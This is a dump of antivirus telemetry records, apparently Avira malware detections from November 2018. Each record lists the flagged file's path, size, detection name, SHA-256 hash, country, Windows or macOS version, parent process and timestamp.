  Row(detection=Row(filename='avscan-20181102-092700-5866b925', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-092602-2644F124\\AVSCAN-20181102-092700-5866B925', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102048-e08ee968', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-102048-E08EE968', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='c770c4431647e097600953a9a34392e9da29f8a3de5dd3adce98dc3bc5872ca0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162841-5775dbbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-162755-510CDF80\\AVSCAN-20181102-162841-5775DBBD', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:16:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9bfd230f2e5087eabbb858335ff80c641ff712aae3d5fd0465ebbfdac4ee70e7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T01:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsl75B4.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T08:42:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_server_behaviors_sb_33.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_server_behaviors_sb_33.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d33ddce829b0e380244358922c831c331dbab3722bbc94bc835f430157e22625', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:41:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b1f11b115b0a84076349b18f114d7251891fb5dd121480367b0092ca8b4a8145', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:09:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-221911-8569acf7', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-221544-6D618304\\AVSCAN-20181104-221911-8569ACF7', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbe8ce74b8e86087a23f070c9afaf36cb2a187bea7ac8f43a0e0cb9e73aefb41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:19:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295e4c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295e4c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:12:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='windowsupdate32.exe', filepath='\\\\?\\C:\\ProgramData\\WindowsUpdater\\WindowsUpdate32.exe', filesize=1600000, name='HEUR/AGEN.1004477.#M1.#R1'), hash='c7d7d681204eba799032f293c34dc6923a94286ac5c59e554a23436055a7ae2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:30:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238f9b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238f9b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F625D34E7133D32BE2A1A1D977F33E34D4757933BADFDDE3834B86EA78986422', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:49:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:05:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsgE319.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203431-df5663a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203431-DF5663A7', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:25:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029238e', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029238e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:07:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bfdd244ac3625cc291bc24b4ccedf133e2d7f1e5bd676d7335e6e77102c69987', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BFDD244AC3625CC291BC24B4CCEDF133E2D7F1E5BD676D7335E6E77102C69987', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bfdd244ac3625cc291bc24b4ccedf133e2d7f1e5bd676d7335e6e77102c69987', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:12:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181202-141840-b41561b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39ad4ce7\\AVSCAN-20181202-141701-A91A1C6D\\AVSCAN-20181202-141840-B41561B7', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='e4cc5421d9dd114b2d159516e4ed5948e075c4aed15602073dcf9a857059941a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:46:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-30-004642/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:48:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-portable-virtualbox_v4.1.4-starter_v6.4.7-win_all.exe', filepath='D:\\internetdownload\\Downloader-fuer-Portable-VirtualBox_v4.1.4-Starter_v6.4.7-Win_all.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='f7838ee63da8cd2892d1e15fcf738f3e22b28c3118b80b2b68a44d7e315f132d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T16:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zemax.exe', filepath='G:\\_big 128\\_cad 65\\Zemax OpticStudio 13 Release 2 Sp4 Premium\\1\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8849464, timestamp='2018-11-04T19:48:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[4].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[4].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='launcher.exe', filepath='C:\\Users\\X\\Desktop\\Alles\\GTA\\client\\launcher.exe', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y3ZY5YdCQ0yHBwXb.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:55:58Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-16-07-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T11:37:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-000105-83e39f66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d946e90\\AVSCAN-20181101-235553-5A2CC07B\\AVSCAN-20181102-000105-83E39F66', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aka,akp.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\DANA AKA,AKP\\AKA,AKP.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/host:bER0cFZrWwchHHV3U3kGEj0NZXpIbg4WLQpiOE5lDxcsVHllQTBNSgBUIihlcRAYNRl\\\\\\/bFpqFwMqTyUzaRwXFlssU3ksQj8WTSZaZGgUaklNJloDLEo7bXgjUBgLDTVgbjvQNA \\\\\\/RR \\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Adobe Photoshop CS2 Downloader - JalanTikus.exe', parentsize=2919016, timestamp='2018-11-02T21:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170551-993d4ff5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89974494\\AVSCAN-20181102-170436-91354B67\\AVSCAN-20181102-170551-993D4FF5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:19:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msrdt.exe', filepath='\\\\?\\C:\\ProgramData\\msrdt.exe', filesize=70256000, name='HEUR/AGEN.1002942.#M1.#R1'), hash='23293d0c219bdc7061c1a0713a5ee5be6f21f5ad0e213c012880938cb8d2c285', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:50:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pol.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\POL\\POL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2afbb15482723fb8a11584946a800fa54f793f35a9f6a0cab09f605d2ffe9463', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061710-2363b016', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-061710-2363B016', filesize=296000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='20cae32feda0d42f0a8e9ed811ceb5e43e8474eecfc3afb052811a383f21d2f4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:19:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9422657\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\SELEÇÃO - HALLOWEEN DO PAGODÃO [NOVEMBRO 2018] www.PuroPagodao.NET_1112844188.exe', parentsize=2473080, timestamp='2018-11-02T22:03:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='4ea270655c6133e002b1208417508d49616245c291894ca12c02324374a11847', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:51:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='office-tab-enterprise-edition-960.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.283\\office-tab-enterprise-edition-960.EXE', filesize=21184000, name='TR/Spy.Zbot.zxwgj.#M1.#R1'), hash='4ec929dac0c65758a056303afce2d0d23ae05b34b9dfda088c9a13d104fb7384', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\office-tab-enterprise-edition-960.rar\\\\\\"', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1540096, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T02:44:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:48:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T17:32:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165953-6663cb50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66228141\\AVSCAN-20181102-164206-F6D54B44\\AVSCAN-20181102-165953-6663CB50', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:59:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0117533.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0117533.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc53c6f46e-c044-dd4b-addc-87a9223d146a.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc53C6F46E-C044-DD4B-ADDC-87A9223D146A.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T20:26:47Z'), dt=datetime.date(2018, 11, 2)),
